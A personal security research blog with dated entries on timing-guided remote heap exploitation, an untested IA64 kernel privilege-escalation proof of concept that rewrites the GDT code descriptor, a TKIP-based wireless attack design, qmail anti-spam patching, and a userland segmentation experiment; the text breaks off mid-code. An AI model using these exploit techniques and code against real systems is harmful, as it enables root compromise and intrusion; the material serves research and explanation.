This is where I put up my thoughts / random notes on things, and whatever I feel like at the point in time. Usually it will be security focused.
For those who are curious, I used the asciidoc package to generate this website, as I don't have too much motivation to write a page out in html syntax and make it look pretty. Thanks to Steven for his script to generate rss feeds from this page structure. Here's the shell script that makes all the html pages for me.
(added 17/10/2009)
While recently working on a heap overflow, I wanted to be able to exploit remote unknown targets that have executable memory. Just for completeness, Exec-shield and PaX would not have prevented exploitation on the distros I checked; they just required a couple more offsets. Oh, and -D_FORTIFY_SOURCE=2 does not help either.
Anyways, the vulnerability has some specialities which make it slightly more fun than normal. During input processing, the heap layout can change considerably. With enough massaging, you can either overwrite a structure with a pointer to a structure which has a function pointer, or cause it to write some data we semi-control to a pointer we can control. Given the situation, both are relatively easy to exploit, although read-only GOT entries will make the latter method harder against unknown targets. (There are function pointers in the .bss, however it requires a lot more massaging and/or luck to hit in that regard.)
Because trying X input strings (where X should allow you to hit it with Y probability) for each address would end up being a lot of attempts / crashes, it would be better to try and isolate a single suitable input string, then loop over potential memory ranges looking for our code. However, the question then is, "Is it feasible to do so?"
In the case of this particular vulnerability, it is feasible by using timing information. We measure the time between sending the string and the socket shutting down (that is, the remote process exiting or crashing), which relates to how much processing was done in the remote process.
If it closes very quickly, it implies we have hit an exit(1) code path early on, due to the heap modification. If it takes too long, we've hit another exit(1) code path, but after it's done a lot of heap processing first.
If it closes a little bit before or a little bit after the ideal time, it usually means the massaging was slightly off. However, there's usually enough difference to identify the ideal case.
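As a rough sketch of that reasoning, the buckets could be written down like this. The ideal time and both tolerances are made-up numbers for illustration (they'd have to come from your own measurements against a test target), and the function name is mine, not something from the actual exploit.

```python
def classify_timing(elapsed, ideal, near=0.0005, far=0.002):
    """Bucket one measurement (in seconds) relative to the ideal close time.

    `near` and `far` are hypothetical tolerances, not measured values.
    """
    delta = elapsed - ideal
    if delta < -far:
        return "early exit"            # bailed out before much heap work
    if delta > far:
        return "late exit"             # did a lot of heap work, then bailed
    if abs(delta) > near:
        return "massaging slightly off"
    return "candidate"


if __name__ == "__main__":
    for sample in (0.001, 0.0051, 0.0062, 0.010):
        print(sample, classify_timing(sample, ideal=0.005))
```

In practice the window would probably be picked by eye from a sorted plot of the timings rather than hardcoded.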
Of course, using timing information is only useful in certain situations (ideally, you're close to the target machine, there's little load on each end, and network load is low). Those challenges can be reduced by owning a machine close to your target. It also helps if the vulnerability you're targeting gives you useful timing information.
The below graph information was generated via:
trigger_str = generate_potential_trigger_string()
start = time.time()
skt.send(trigger_str)
rlist, wlist, xlist = select.select([skt], [], [skt], 1.0)
stop = time.time()
difference = stop - start
and doing that 200 times, sorting, and putting the results into a text file, and having gnuplot graph it for us.
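For reference, here's a minimal, self-contained sketch of that collection loop in Python 3. The helper names are mine, and the demo measures a local socket pair standing in for the remote service, so the numbers it produces mean nothing; it only shows the measure, sort, and dump-for-gnuplot shape.

```python
import select
import socket
import threading
import time


def time_until_readable(skt, payload, timeout=1.0):
    """Send payload, then return the seconds until the socket is readable,
    in error, or the timeout expires (a peer close shows up as readable)."""
    start = time.time()
    skt.send(payload)
    select.select([skt], [], [skt], timeout)
    return time.time() - start


def collect_samples(measure, attempts=200):
    """Call measure() `attempts` times and return the sorted timings."""
    return sorted(measure() for _ in range(attempts))


def to_gnuplot_rows(samples):
    """Format samples as 'index seconds' lines, one per measurement."""
    return "".join("%d %.6f\n" % (i, t) for i, t in enumerate(samples))


if __name__ == "__main__":
    def one_attempt():
        # Stand-in target: reads once, then closes its end of the pair.
        ours, theirs = socket.socketpair()

        def peer():
            theirs.recv(64)
            theirs.close()

        worker = threading.Thread(target=peer)
        worker.start()
        try:
            return time_until_readable(ours, b"trigger")
        finally:
            worker.join()
            ours.close()

    with open("timings.txt", "w") as out:
        out.write(to_gnuplot_rows(collect_samples(one_attempt, attempts=20)))
```

The output file name is arbitrary; something like `plot "timings.txt"` in gnuplot should be enough to eyeball the result.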
While it could probably be argued that python isn't ideal for gathering such precise timing information, we'll ignore that for now. It's working for this demonstration, which is all I care about :p
In the below graph, red crosses are "uninteresting", and green ones are "interesting". The "interesting" state is a crash that's directly related to the function pointer cleanup code. The blue dot is a crash relating to memset() (usually a pointer we control), and purple is an "other" crash (usually due to our pointer not being aligned properly due to allocation layout).
The above graph paints an interesting picture. At the beginning, there are some very early exit(1) code paths, then more around and below the 0.005 time marker. At around the 0.005 and 160 intersect, we start getting crashes due to our input corrupting the process's heap (blue/purple/green) in a useful way, taking successively longer to crash.
Once we have one of the green crashes, we can use that to bruteforce the section of memory that will lead to code execution.
In closing, I hope this brief article shows some of the benefits that timing can provide, in suitable situations, when exploiting targets you have little information about.
(added 11/10/2009)
This posting is to clear a backlog of things I've been meaning to post at some stage. They're mostly unfinished due to a lack of motivation.. but here goes:
(started around 23/5/2008)
While recently doing some random research, I was browsing the linux 2.6.25.2 kernel source, in arch/ia64/ia32/. While I was reading over the binfmt_elf32.c file, I stumbled across an interesting comment in the function ia64_elf32_init():
/*
 * Map GDT below 4GB, where the processor can find it. We need to map
 * it with privilege level 3 because the IVE uses non-privileged accesses to these
 * tables. IA-32 segmentation is used to protect against IA-32 accesses to them.
 */
I thought it was particularly interesting in how they mentioned that segmentation would be used to protect access and modification of the applicable data.
Please keep in mind that I don't have an IA64 box to test this on, so it's currently speculation based on what information I can gather. If you do have an IA64 box with IA32 linux emulation, feel free to test and report back to me, I'd be interested in finding out :)
The code seems to lay memory out with a 3GB user address space, with a couple of pages above the 3GB mark for the GDT, LDT, and TSS.
From the ia32priv.h file, we have:
#define IA32_STACK_TOP IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET IA32_PAGE_OFFSET
#define IA32_GATE_END IA32_PAGE_OFFSET + PAGE_SIZE
/*
 * The system segments (GDT, TSS, LDT) have to be mapped below 4GB so the
 * IA-32 engine can access them.
 */
#define IA32_GDT_OFFSET (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET (IA32_PAGE_OFFSET + 3*PAGE_SIZE)
Where IA32_PAGE_OFFSET is #define'd to 0xc0000000 in include/asm-ia64/ia32.h.
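Plugging the numbers in gives the addresses of interest. This is just arithmetic on the defines above; the function name is mine. One assumption worth flagging: as far as I know the kernel page size on IA64 is a build-time option, so it's a parameter here, with 4096 as the value the rest of this post assumes.

```python
IA32_PAGE_OFFSET = 0xc0000000


def ia32_system_segments(page_size=4096):
    """Addresses of the GDT/TSS/LDT pages, following the ia32priv.h defines.

    page_size is an assumption about the target kernel's PAGE_SIZE.
    """
    return {
        "gdt": IA32_PAGE_OFFSET + page_size,
        "tss": IA32_PAGE_OFFSET + 2 * page_size,
        "ldt": IA32_PAGE_OFFSET + 3 * page_size,
    }


if __name__ == "__main__":
    for name, addr in sorted(ia32_system_segments().items()):
        print("%s 0x%08x" % (name, addr))
```

If the target kernel uses larger pages, the offsets move accordingly, e.g. `ia32_system_segments(16384)` puts the GDT at 0xc0004000.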
There appear to be several ways we can access the data. The easiest is probably via the standard system calls that take a pointer and use it in some way, such as read() or write(). Additionally, we can directly modify the data by creating a new descriptor and setting the limit to 4GB (which can be done via the modify_ldt() syscall).
Using the read() / write() mechanism is probably the best way to manipulate the data, and probably most flexible.
Creating a new descriptor is easy enough, the below code shows how to:
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <asm/ldt.h>
#include <stdio.h>
#define TYPE user_desc // modify_ldt_ldt_s for 2.4
int do_ldt(int num, unsigned long base, int type)
{
struct TYPE ldt_entry = {
num, // entry_number
(unsigned long int) (base), // base_address
0xfffff, // limit, 4G
1, // seg_32bit
type, // contents
0, // read_exec_only
1, // limit_in_pages
0, // seg_not_present
1 // usable
};
return modify_ldt(1, &ldt_entry, sizeof(struct TYPE)) == 0;
}
int main(int argc, char **argv)
{
if(do_ldt(0, 0, MODIFY_LDT_CONTENTS_DATA) == 0) {
printf("Failed to modify the ldt\n");
exit(EXIT_FAILURE);
}
// the new segment will be accessible via 0x07, (0 * 8) | user priv | ldt etc.
__asm__ volatile("pushw $7;\
popw %ds;");
printf("We've changed our ds segment descriptor\n");
}
If the above code is being compiled on a 2.4 kernel, the struct user_desc will need to be changed to struct modify_ldt_ldt_s, which can be done via changing the TYPE define above. This should allow direct access according to the comment above. Make sure it's compiled in 32 bit mode, and appropriate emulation options/modules are active.
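The 0x07 in the comment falls out of the x86 selector layout: the descriptor index sits in the top 13 bits, bit 2 says whether to look in the LDT rather than the GDT, and the low two bits are the requested privilege level. A small sketch (function names are mine):

```python
def make_selector(index, ldt, rpl):
    """Build an x86 segment selector: index << 3 | table bit << 2 | RPL."""
    return (index << 3) | (int(bool(ldt)) << 2) | (rpl & 3)


def split_selector(selector):
    """Return (index, uses_ldt, rpl) for a selector value."""
    return selector >> 3, bool(selector & 4), selector & 3


if __name__ == "__main__":
    # LDT entry 0 at user privilege, as loaded into %ds above.
    print(hex(make_selector(0, ldt=True, rpl=3)))
    # The usual 32 bit Linux user code/data selectors are GDT entries.
    print(split_selector(0x23), split_selector(0x2b))
```

So LDT entry N at ring 3 is always N * 8 + 7.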
The write_ldt() function in ia32_ldt.c in 2.6.25.2 doesn't appear to do any checking of what memory the new descriptor makes accessible.
I'd like to repeat again that I don't have access to an IA64 box to test this out, but I'm going to attempt to write a couple of proof of concept exploits. Let me know if it works :)
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#define PAGE_SIZE 4096
#define IA32_PAGE_OFFSET 0xc0000000
//#define IA32_PAGE_OFFSET (x == 0 ? x = malloc(4 * 4096) : x)
#define IA32_STACK_TOP IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET IA32_PAGE_OFFSET
#define IA32_GATE_END IA32_PAGE_OFFSET + PAGE_SIZE
#define IA32_GDT_OFFSET (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET (IA32_PAGE_OFFSET + 3*PAGE_SIZE)
unsigned char *x;
int main(int argc, char **argv)
{
int fd;
fd = open("gdt.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
if(fd == -1) {
printf("Failed to open gdt.bin: %m\n");
exit(EXIT_FAILURE);
}
if(write(fd, (void *)IA32_GDT_OFFSET, 4096) != 4096) {
printf("Failed to write() 4096 bytes\n");
exit(EXIT_FAILURE);
}
close(fd);
printf("Dumped GDT\n");
fd = open("tss.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
if(fd == -1) {
printf("Failed to open tss.bin: %m\n");
exit(EXIT_FAILURE);
}
if(write(fd, (void *)IA32_TSS_OFFSET, 4096) != 4096) {
printf("Failed to write() 4096 bytes\n");
exit(EXIT_FAILURE);
}
close(fd);
printf("Dumped TSS\n");
fd = open("ldt.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
if(fd == -1) {
printf("Failed to open ldt.bin: %m\n");
exit(EXIT_FAILURE);
}
if(write(fd, (void *)IA32_LDT_OFFSET, 4096) != 4096) {
printf("Failed to write() 4096 bytes\n");
exit(EXIT_FAILURE);
}
close(fd);
printf("Dumped LDT\n");
}
After thinking about it a little bit, there may be little point in getting ring0 itself, but I haven't completely read through the itanium manuals.
According to the docs I've read so far, io ports need to be explicitly mapped in by the operating system, and enabled. Other "privileged" instructions generate traps.
If ring0 would be useful in some capacity, it could be gained by setting appropriate LDT entries if needed, and overwriting the TSS saved CS register and modifying the privilege level.
However, there would be a way to gain additional privileges if there exists a setuid root x86 binary installed on the system. This would be done by manipulating the base address of the code segment descriptor in the GDT so that upon execve() of a suid process, the entry point would end up pointing to custom code (probably on the stack), due to the segment base. From what I've read of the itanium manual, segmentation is used to calculate the real address it accesses (a la x86).
Setting the GDT base would also have the side effect of probably crashing any existing IA32 processes.
Theory:
Calculate where the initial entry point is going to be
Calculate where our stack arguments are going to be
Or a suitable .text / library code location
Modify the GDT base value for USER_CS
Execute a setuid x86 binary.
Randomisation probably won't be an issue due to the personality() syscall :)
The initial entry point will be the entry point in the binary if it's not dynamically linked. If it's dynamically linked, the loader's entry point will be the initial entry point.
Here's some sample code I came up with; I don't know if it works or not since I don't have access to the architecture to test. Don't forget to compile in 32bit mode (-m32 may suffice). If your compiler doesn't generate suitable binaries, compile on an x86 box.
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#define PAGE_SIZE 4096
#define IA32_PAGE_OFFSET 0xc0000000
//#define IA32_PAGE_OFFSET (x == 0 ? x = malloc(4 * 4096) : x)
#define IA32_STACK_TOP IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET IA32_PAGE_OFFSET
#define IA32_GATE_END IA32_PAGE_OFFSET + PAGE_SIZE
#define IA32_GDT_OFFSET (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET (IA32_PAGE_OFFSET + 3*PAGE_SIZE)
unsigned char *x;
/* borrowed from arch/ia64/ia32/ia32priv.h */
#define IA32_PAGE_SHIFT 12 /* 4KB pages */
#define __USER_CS 0x23
#define __USER_DS 0x2B
#define IA32_SEG_BASE 16
#define IA32_SEG_TYPE 40
#define IA32_SEG_SYS 44
#define IA32_SEG_DPL 45
#define IA32_SEG_P 47
#define IA32_SEG_HIGH_LIMIT 48
#define IA32_SEG_AVL 52
#define IA32_SEG_DB 54
#define IA32_SEG_G 55
#define IA32_SEG_HIGH_BASE 56
/* changed to unsigned long long: in a 32bit build, unsigned long is too narrow for the shifts past bit 31 */
#define IA32_SEG_DESCRIPTOR(base, limit, segtype, nonsysseg, dpl, segpresent, avl, segdb, gran) \
(((limit) & 0xffff) \
| (((unsigned long long) (base) & 0xffffff) << IA32_SEG_BASE) \
| ((unsigned long long) (segtype) << IA32_SEG_TYPE) \
| ((unsigned long long) (nonsysseg) << IA32_SEG_SYS) \
| ((unsigned long long) (dpl) << IA32_SEG_DPL) \
| ((unsigned long long) (segpresent) << IA32_SEG_P) \
| ((((unsigned long long) (limit) >> 16) & 0xf) << IA32_SEG_HIGH_LIMIT) \
| ((unsigned long long) (avl) << IA32_SEG_AVL) \
| ((unsigned long long) (segdb) << IA32_SEG_DB) \
| ((unsigned long long) (gran) << IA32_SEG_G) \
| ((((unsigned long long) (base) >> 24) & 0xff) << IA32_SEG_HIGH_BASE))
/* </borrowed> */
int main(int argc, char **argv)
{
int fd;
unsigned char scratch[4096];
unsigned long long *gdt = (unsigned long long *)(scratch);
unsigned long long entry_point;
if(argc != 2) {
printf("%s <gdt offset>\n", argv[0] ? argv[0] : ";PpP");
printf("--> 0xbfffe000 (or wherever your r00tc0de is- <libc entry point> = offset, i think ;p\n");
printf("--> offset probably needs to be aligned so it can be shifted\n");
printf("--> in hex\n");
exit(EXIT_FAILURE);
}
entry_point = strtoul(argv[1], 0, 16);
fd = open("gdt.bin", O_RDWR|O_TRUNC|O_CREAT, 0600);
unlink("gdt.bin");
if(fd == -1) {
printf("Failed to open gdt.bin: %m\n");
exit(EXIT_FAILURE);
}
if(write(fd, (void *)IA32_GDT_OFFSET, 4096) != 4096) {
printf("Failed to write() 4096 bytes\n");
exit(EXIT_FAILURE);
}
printf("--> Dumped GDT\n");
if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
printf("Unable to seek to start of fd\n");
exit(EXIT_FAILURE);
}
if(read(fd, scratch, 4096) != 4096) {
printf("Unable to read 4096 bytes from our fd\n");
exit(EXIT_FAILURE);
}
if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
printf("Unable to seek to start of fd\n");
exit(EXIT_FAILURE);
}
// borrowed from ia32_support.c :P, but modified
gdt[__USER_CS >> 3] = IA32_SEG_DESCRIPTOR(entry_point, (IA32_GATE_END-1) >> IA32_PAGE_SHIFT,
0xb, 1, 3, 1, 1, 1, 1);
if(write(fd, scratch, 4096) != 4096) {
printf("Unable to write modified data back\n");
exit(EXIT_FAILURE);
}
if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
printf("Unable to seek backwards\n");
exit(EXIT_FAILURE);
}
printf("--> If things go well, then this should crash once read() returns to userspace. If not, hmm! maybe we moved to another processor afterwards or so?\n");
if(read(fd, (void *)IA32_GDT_OFFSET, 4096) != 4096) {
printf("Failed to read() 4096 bytes :(\n");
exit(EXIT_FAILURE);
}
printf("Hrm. It worked. but it hasn't crashed. Maybe re-run a couple of times? Maybe I've missed something?\n");
close(fd);
}
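To sanity check the descriptor packing without the hardware, the same bit layout can be reproduced in Python, where integers don't overflow. This is my own re-expression of the IA32_SEG_DESCRIPTOR bit positions used above (the function names are mine), not kernel code. The flat 4GB ring 3 code segment comes out as the familiar 0x00cffb000000ffff.

```python
def seg_descriptor(base, limit, segtype, nonsysseg, dpl, present, avl, db, gran):
    """Pack a 64 bit x86 segment descriptor, same field layout as above."""
    return ((limit & 0xffff)
            | ((base & 0xffffff) << 16)        # base bits 0..23
            | (segtype << 40)
            | (nonsysseg << 44)
            | (dpl << 45)
            | (present << 47)
            | (((limit >> 16) & 0xf) << 48)    # limit bits 16..19
            | (avl << 52)
            | (db << 54)
            | (gran << 55)
            | (((base >> 24) & 0xff) << 56))   # base bits 24..31


def descriptor_base(desc):
    """Pull the 32 bit base address back out of a packed descriptor."""
    return ((desc >> 16) & 0xffffff) | (((desc >> 56) & 0xff) << 24)


if __name__ == "__main__":
    flat_code = seg_descriptor(0, 0xfffff, 0xb, 1, 3, 1, 0, 1, 1)
    print("0x%016x" % flat_code)
    moved = seg_descriptor(0x12345678, 0xfffff, 0xb, 1, 3, 1, 0, 1, 1)
    print("0x%016x base=0x%08x" % (moved, descriptor_base(moved)))
```

Note how everything above bit 31 (type, DPL, present, granularity, the top of the base) disappears if the value is squeezed through a 32 bit type, which is worth keeping in mind when building the C version with -m32.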
At any rate, spender tested the code up to dumping the GDT, which goes to show it can be accessed, and presumably modified (I suspect you could mprotect() it if it is made read only at some stage).
I haven't been able to test the rest due to lack of access to hardware :p
(started 14/12/2008)
When the TKIP flaw came to light (which allowed you to send a couple of packets to a client station), I played around with the idea of using an attacker controlled machine on the internet to help "conspire" against the client station.
By using the UIP TCP/IP stack, I wrote a program to help attack the client by the following means:
Wireless attacker -> Does TKIP attack, can send some packets to client machine
Wireless attacker -> Sends SYN packets to client machine on "common"
vulnerable ports (139/445/80/23/etc), with source IP of
an internet machine we control
Internet Machine -> Looks for SYN|ACK packets, if found, sets up a suitable
UIP connection structure, and fixes up the seq/ack
numbers. Machine then creates a local socket, and buffers
the data between local socket, and UIP connection to the
attacked machine.
Wireless attacker -> Can then attack the client machine with a bunch of
standard exploits
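The "fixes up the seq/ack numbers" step is ordinary TCP three-way handshake arithmetic: the internet machine never sent the SYN itself, so it has to take its sequence number from the ack field of the SYN|ACK it observes, and acknowledge the peer's sequence number plus one. A sketch of just that calculation follows; it is not uIP code, and the function name is made up.

```python
MOD32 = 1 << 32


def ack_for_synack(synack_seq, synack_ack):
    """Return (seq, ack) for the ACK segment that completes the handshake.

    synack_seq / synack_ack are the sequence and acknowledgement numbers
    carried in the observed SYN|ACK. Sequence numbers wrap at 2**32.
    """
    our_seq = synack_ack % MOD32           # the peer already acked SYN + 1
    our_ack = (synack_seq + 1) % MOD32     # the peer's SYN consumes one number
    return our_seq, our_ack


if __name__ == "__main__":
    print(ack_for_synack(synack_seq=5000, synack_ack=1001))
```

From there on the connection state is the same as if the handshake had been done normally.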
This type of attack is highly dependent on the network infrastructure in use. Outgoing SYN|ACKs may not be NAT'd properly in NAT environments (due to no incoming SYN being seen), firewalls may not allow outgoing connections, and as an additional complication the attacked client may have a firewall enabled, etc.
(added 5/4/2009)
Recently I was asked to help admin a box (amongst other things). One of the particular concerns was the amount of incoming spam to the box. Usually, I would use postfix + various settings to handle e-mail, but the other admins wanted to keep qmail.
The box itself is running Gentoo Hardened, with qmail. At some stage, a custom qmail was configured — I wanted to return to using the gentoo packaging system to take care of that for me. After finding out it was patched with something to verify RCPT TO headers against (as opposed to accepting mail for every possible email address at a given domain, then sending bounce messages), I looked for something suitable, and came across this patch. Please see this website for further information.
Unfortunately, the patch didn't apply cleanly, so that was fixed. This patch is available here if you want it. It was modified to use /var/qmail/control/moregoodrcptto.cdb as opposed to its default, as that's how the system I was helping with was configured.
Additionally, I wanted SPF verification / rejecting if the sending host is not authorized. I found a suitable patch here, which (as you guessed) didn't apply cleanly. The updated patch is available here.
Please see the respective websites for more information / configuration changes you may need to make.
In order to use these with Gentoo, you can do the following:
# mkdir /root/qmail_patches
# cd /root/qmail_patches
# wget http://felinemenace.org/~andrewg/antispam_with_gentoo_netqmail/1_rcptto.patch
# wget http://felinemenace.org/~andrewg/antispam_with_gentoo_netqmail/2_spf_filtering.patch
# echo QMAIL_PATCH_DIR="/root/qmail_patches" >> /etc/make.conf
# emerge netqmail
At which point it will compile netqmail with the patches in /root/qmail_patches.
Additionally, I enabled rblsmtpd in /var/qmail/control/conf-smtpd, via uncommenting and editing the QMAIL_SMTP_PRE variable, to the following:
QMAIL_SMTP_PRE="${QMAIL_SMTP_PRE} rblsmtpd -r sbl-xbl.spamhaus.org"
And, well, that's the end of the changes. If you're looking for anti-spam stuff, I'd suggest you use Postfix, as it's still being developed, and doesn't require random patching to get simple functionality working :-)
(started 4/5/2008, added 5/5/2008)
This document describes how it could be feasible to implement a pseudo PaX implementation completely in userland. The described idea is far more of a plaything than anything serious, for reasons described later. It's more just random thoughts and experiments.
I don't recall how I got started along this track, except that it was something I've been meaning to look at for a while.
Firstly, we should review how PaX's segmexec operates.
While Linux effectively does not use segmentation by creating 0 based and 4 GB limited segments for both code and data accesses (therefore logical addresses are the same as linear addresses), it is possible to set up segments that allow to implement non-executable pages. The basic idea is that we divide the 3 GB userland linear address space into two equal halves and use one to store mappings meant for data access (that is, we define a data segment descriptor to cover the 0-1.5 GB linear address range) and the other for storing mappings for execution (that is, we define a code segment descriptor to cover the 1.5-3 GB linear address range). Since an executable mapping can be used for data accesses as well, we will have to ensure that such mappings are visible in both segments and mirror each other. This setup will then separate data accesses from instruction fetches in the sense that they will hit different linear addresses and therefore allow for control/intervention based on the access type. In particular, if a data-only (and therefore non-executable) mapping is present only in the 0-1.5 GB linear address range, then instruction fetches to the same logical addresses will end up in the 1.5-3 GB linear address range and will raise a page fault hence allow detecting such execution attempts.
PaX's segmexec works by modifying the Global Descriptor Table which separates code and data requests to different virtual addresses.
Userspace, as far as I know, can't modify the Global Descriptor Table, but it can influence its own Local Descriptor Table via the modify_ldt() system call. The modify_ldt() syscall can create code and data descriptors easily enough, and we can use call far and return far (amongst other techniques) to change into that selector.
As a sample, let's try and execute an int3 instruction. We'll create a new LDT entry with a base address of 4096, which means that once it's loaded into CS, every code address has to have 4096 subtracted from it. And on with the show:
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <fcntl.h>
#include <asm/ldt.h>
asm(".globl debug;\
.type debug, @function;\
debug:;\
int3;\
.size debug, .-debug;\
"
);
extern void debug();
/*
<asm/ldt.h>
struct modify_ldt_ldt_s {
unsigned int entry_number;
unsigned long base_addr;
unsigned int limit;
unsigned int seg_32bit:1;
unsigned int contents:2;
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
};
#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2
*/
int do_ldt(int num, unsigned long base, int type)
{
struct modify_ldt_ldt_s ldt_entry = {
num, // entry_number
(unsigned long int) (base), // base_address
0xfffff, // limit, 4G or so :p
1, // seg_32bit
type, // contents
1, // read_exec_only
1, // limit_in_pages
0, // seg_not_present
1 // usable
};
return modify_ldt(1, &ldt_entry, sizeof(struct modify_ldt_ldt_s)) == 0;
}
int main(int argc, char **argv)
{
short int seg;
if(do_ldt(0, 0x1000, MODIFY_LDT_CONTENTS_CODE) == 0) {
printf("Failed to modify ldt\n");
exit(EXIT_FAILURE);
}
seg = 7; // (0 * 8) + 7
//printf("new segment: %d|%02x\n", seg, seg);
__asm__ volatile("pushw %0;\
pushl %1;\
lret"
:
: "r" (seg), "r" ((unsigned int)(debug) - 0x1000)
);
}
Running the above code under a debugger:
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) r
Starting program: /root/drifter/ldt/ldt_wot
(no debugging symbols found)
(no debugging symbols found)
Program received signal SIGTRAP, Trace/breakpoint trap.
0x08047559 in ?? ()
(gdb) x/4i $eip -1
0x8047558: Cannot access memory at address 0x8047558
(gdb) x/4i $eip - 1 + 4096
0x8048558 <debug>: int3
0x8048559 <do_ldt>: push %ebp
0x804855a <do_ldt+1>: mov %esp,%ebp
0x804855c <do_ldt+3>: sub $0x48,%esp
(gdb) i r cs
cs 0x7 7
As we can see in the debugger output, it's possible to set a custom CS descriptor, and execute code. Due to the now non-flat memory address space, it also messes with debugging a little bit.
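The address juggling in that gdb session is just the segment base being added on every instruction fetch: linear = base + logical. A tiny sketch of the conversion both ways, using the addresses from the output above (helper names are mine):

```python
MASK32 = 0xffffffff


def to_logical(linear, base):
    """Offset to use inside a segment so that it lands on `linear`."""
    return (linear - base) & MASK32


def to_linear(logical, base):
    """Linear address the CPU actually touches for a segment offset."""
    return (logical + base) & MASK32


if __name__ == "__main__":
    base = 0x1000
    # debug() lives at 0x8048558, so with CS based at 4096 we jump here:
    print(hex(to_logical(0x8048558, base)))
    # gdb reports eip = 0x08047559 after the int3, which is really:
    print(hex(to_linear(0x08047559, base)))
```

gdb assumes a flat layout, which is why it can't read memory at $eip directly and needs the + 4096.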
Quickly reviewing what we need to do:
Choose where to split our memory (let's stick with 0x60000000)
Duplicate code to the code section
Handle segmentation violations
Unmap old stack because it's at an inconvenient location.
Doing the above completely correctly would be difficult from userland, but possible if a bit of effort was to be expended.
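Two bits of arithmetic are worth spelling out before the code: how a page-granular limit turns into a size, and where the executable mirror of a mapping has to live for a code segment based at the split. A sketch, with names of my own choosing and a 4096 byte page assumed:

```python
PAGE = 4096
SPLIT = 0x60000000  # code segment base, and size of each half


def limit_to_bytes(limit, limit_in_pages=True):
    """Size in bytes covered by a descriptor limit field."""
    return (limit + 1) * (PAGE if limit_in_pages else 1)


def code_mirror(addr):
    """Linear address an instruction fetch at `addr` really hits."""
    if addr >= SPLIT:
        raise ValueError("address is outside the data half")
    return addr + SPLIT


if __name__ == "__main__":
    print(hex(limit_to_bytes(0x5ffff)))   # 1.5GB code segment
    print(hex(limit_to_bytes(0xfffff)))   # flat 4GB segment
    print(hex(code_mirror(0x08048000)))   # where the .text copy must go
```

Anything without a copy at `code_mirror(addr)` faults on execution, which is the whole trick.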
For the purposes of this article, we'll write it using dietlibc, and make it not that feasible to use.
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <fcntl.h>
#include <asm/ldt.h>
#include <sys/mman.h>
#include <asm/unistd.h>
/*
<asm/ldt.h>
struct modify_ldt_ldt_s {
unsigned int entry_number;
unsigned long base_addr;
unsigned int limit;
unsigned int seg_32bit:1;
unsigned int contents:2;
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
};
#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2
*/
_syscall3(int,modify_ldt,int,op,void*,what,int,len);
/*int modify_ldt(int op, void *what, int len)
{
return syscall(__NR_modify_ldt, op, what, len);
}*/
int do_ldt(int num, unsigned long base, int type)
{
struct modify_ldt_ldt_s ldt_entry = {
num, // entry_number
(unsigned long int) (base), // base_address
0x5ffff, // limit, 1.5G or so :p
1, // seg_32bit
type, // contents
1, // read_exec_only
1, // limit_in_pages
0, // seg_not_present
1 // usable
};
return modify_ldt(1, &ldt_entry, sizeof(struct modify_ldt_ldt_s)) == 0;
}
int do_exit()
{
exit(EXIT_SUCCESS);
}
void vulnerable()
{
int j[1];
int i;
char code[] = "\xcc\xcc\xcc\xcc";
#ifdef HEAP
int addr = strdup(code);
#else
int addr = &code;
#endif
//char *where;
//__asm__("int3;");
for(i = 0; i < 10; i++) j[i] = (unsigned int)(addr);
}
unsigned char *old_stack;
int old_stack_len;
void duplicate_code_mappings()
{
// taken from drifter level 11 code, but modified.
FILE *f;
int hi, low;
char flags[5];
int wot;
int major, minor;
int size;
char remainder[1024];
int ret;
unsigned char *new;
f = fopen("/proc/self/maps", "r");
while(8 == (ret = fscanf(f, "%08x-%08x %[^ \n] %08x %02x:%02x %08x%[^\n]", &low, &hi, flags, &wot, &major, &minor, &size, remainder))) {
if((low & 0x60000000) == 0x60000000) continue;
size = hi - low;
/*
* size = hi - low;
* printf("--> %08x-%d\n", low, size);
printf("--> %08x-%08x %s %d %d:%d %d %s\n", low, hi, flags, wot, major, minor, size, remainder);
*/
// r-xp
if(flags[1] == '-' && flags[2] == 'x') {
printf("--> Duplicating 0x%08x, %d bytes long\n", low, size);
